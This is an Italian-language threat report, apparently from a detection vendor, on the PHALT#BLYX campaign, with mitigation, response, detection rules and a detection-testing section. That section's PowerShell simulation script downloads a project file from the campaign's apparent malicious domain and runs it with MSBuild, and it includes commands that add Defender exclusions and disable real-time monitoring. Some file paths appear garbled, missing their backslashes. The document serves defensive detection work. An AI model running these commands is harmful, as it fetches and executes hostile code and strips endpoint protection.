Analisi di PHALT#BLYX: Falsi BSOD e Strumenti di Build Affidabili nelle Catene di Malware
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Il report dettagli un’intrusione a più fasi che colpisce il settore dell’ospitalità combinando una pagina di destinazione falsa di Booking.com, un’animazione fuorviante in stile schermata blu e un prompt in stile ClickFix per persuadere gli utenti a eseguire un dropper PowerShell. Quel dropper recupera un file di progetto MSBuild, che esegue un loader DCRat su misura. Il loader altera Windows Defender, imposta la persistenza utilizzando un collegamento .url di avvio e inietta il suo payload in processi legittimi. Sfruttando utilità di living-off-the-land come PowerShell e MSBuild.exe, gli operatori riducono evidenti tracce di malware. Sono anche notati artefatti in lingua russa nella catena come indizio di attribuzione.
Investigazione
I ricercatori di Securonix hanno mappato il flusso da email di phishing che offrono link di “cancellazione prenotazione” a un dominio malevolo, poi a un one-liner PowerShell che individua msbuild.exe, scarica un file v.proj e lo esegue. Il progetto v.proj esegue diverse azioni: aggiunge esclusioni di Windows Defender, scarica staxs.exe (una variante di DCRat), crea un collegamento .url di Avvio per la persistenza e si collega all’infrastruttura di comando e controllo sulla porta 3535. Il loader quindi comprime e inietta la fase finale in aspnet_compiler.exe, usando l’hollowing dei processi per confondersi con attività legittime.
Mitigazione
Ridurre l’esposizione addestrando gli utenti a riconoscere i prompt in stile ClickFix e il social engineering “esegui questo comando per risolvere”. Monitorare e limitare l’esecuzione di MSBuild.exe, specialmente quando invocata da percorsi insoliti o workflow guidati dall’utente e abilitare il logging dei blocchi script di PowerShell per maggiore visibilità. Aggiungere rilevamenti per la creazione di collegamenti .url nella cartella Avvio e per modifiche alle esclusioni di Windows Defender. A livello di rete, bloccare il traffico in uscita verso i domini malevoli identificati e limitare esplicitamente o avvisare su egress sospetti verso TCP/3535 dove non richiesto.
Risposta
Se viene rilevata attività, isolare il host e preservare i principali artefatti inclusi v.proj, staxs.exe e qualsiasi file .url di Avvio. Rimuovere esclusioni non autorizzate di Defender, terminare processi malevoli o iniettati e bloccare i domini/IP C2 associati, in particolare qualsiasi comunicazione sulla porta 3535. Resettare eventuali credenziali esposte, eseguire una scansione completa di malware e esaminare l’ambiente per schemi di esecuzione guidati da MSBuild e comandi PowerShell simili. Infine, implementare rilevamenti informati da intelligence sulle minacce che si concentrano sull’abuso di MSBuild, sul comportamento ClickFix e sulla persistenza tramite scorciatoie di Avvio per prevenire recidive.
Flusso di Attacco
Rilevazioni
Download o Upload tramite Powershell (tramite cmdline)
Visualizza
Modifiche Sospette alle Preferenze di Windows Defender (tramite powershell)
Visualizza
Punti di Possibile Persistenza [ASEPs – Software/Hive NTUSER] (tramite registry_event)
Visualizza
Binari / Script Sospetti in Posizione di Avvio Automatico (tramite file_event)
Visualizza
IOC (HashSha512) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (SourceIP) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (HashSha256) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
IOC (DestinationIP) da rilevare: Analizzando PHALT#BLYX: Come Falsi BSOD e Strumenti di Costruzione Fidati Vengono Utilizzati per Costruire un’Infezione da Malware
Visualizza
Esecuzione di Payload Malevolo PHALT#BLYX tramite MSBuild e Process Hollowing [Creazione Processi Windows]
Visualizza
Campagna Malware PHALT#BLYX Utilizzando PowerShell e MSBuild per Infezione [Windows Powershell]
Visualizza
Esecuzione Simulazione
Prerequisito: Il Controllo di Telemetria & Baseline Pre-Volare deve essere superato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e il racconto riflettono direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrativa e Comandi di Attacco:
L’attore della minaccia apre una sessione PowerShell su un endpoint compromesso. Individuano per prima cosamsbuild.exebinary, poi scaricano un progetto malevolo MSBuild (v.proj) inC:ProgramData. L’attaccante invoca immediatamentemsbuild.exeper eseguire il payload, che rilascia una seconda fase. Infine, manomettono Windows Defender aggiungendo esclusioni e disabilitando il monitoraggio in tempo reale per garantire la persistenza. -
Script di Test di Regressione:
# Script di simulazione PHALT#BLYX – riproduce attività che attivano il rilevamento # -------------------------------------------------------------- # 1. Individua msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Scarica il progetto MSBuild malevolo a ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Esegui il progetto con msbuild.exe & $msb $dest # 4. Modifica le impostazioni di Windows Defender (qualsiasi delle seguenti soddisferà la regola) # Decommenta le righe desiderate per simulare le azioni dell'attaccante. # Aggiungi percorso esclusione # Add-MpPreference -ExclusionPath "$env:ProgramData" # Aggiungi esclusione per file .exe # Add-MpPreference -ExclusionExtension ".exe" # Aggiungi esclusione per file .ps1 # Add-MpPreference -ExclusionExtension ".ps1" # Disabilita monitoraggio in tempo reale # Set-MpPreference -DisableRealtimeMonitoring $true -
Comandi di Pulizia:
# Rimuovi il file di progetto rilasciato Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Ripristina il monitoraggio in tempo reale di Windows Defender (se era stato disabilitato) Set-MpPreference -DisableRealtimeMonitoring $false # Rimuovi eventuali esclusioni aggiunte (esempio per esclusione percorso) Remove-MpPreference -ExclusionPath "$env:ProgramData" # Opzionalmente elimina eventuali file persistenti creati dal payload # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue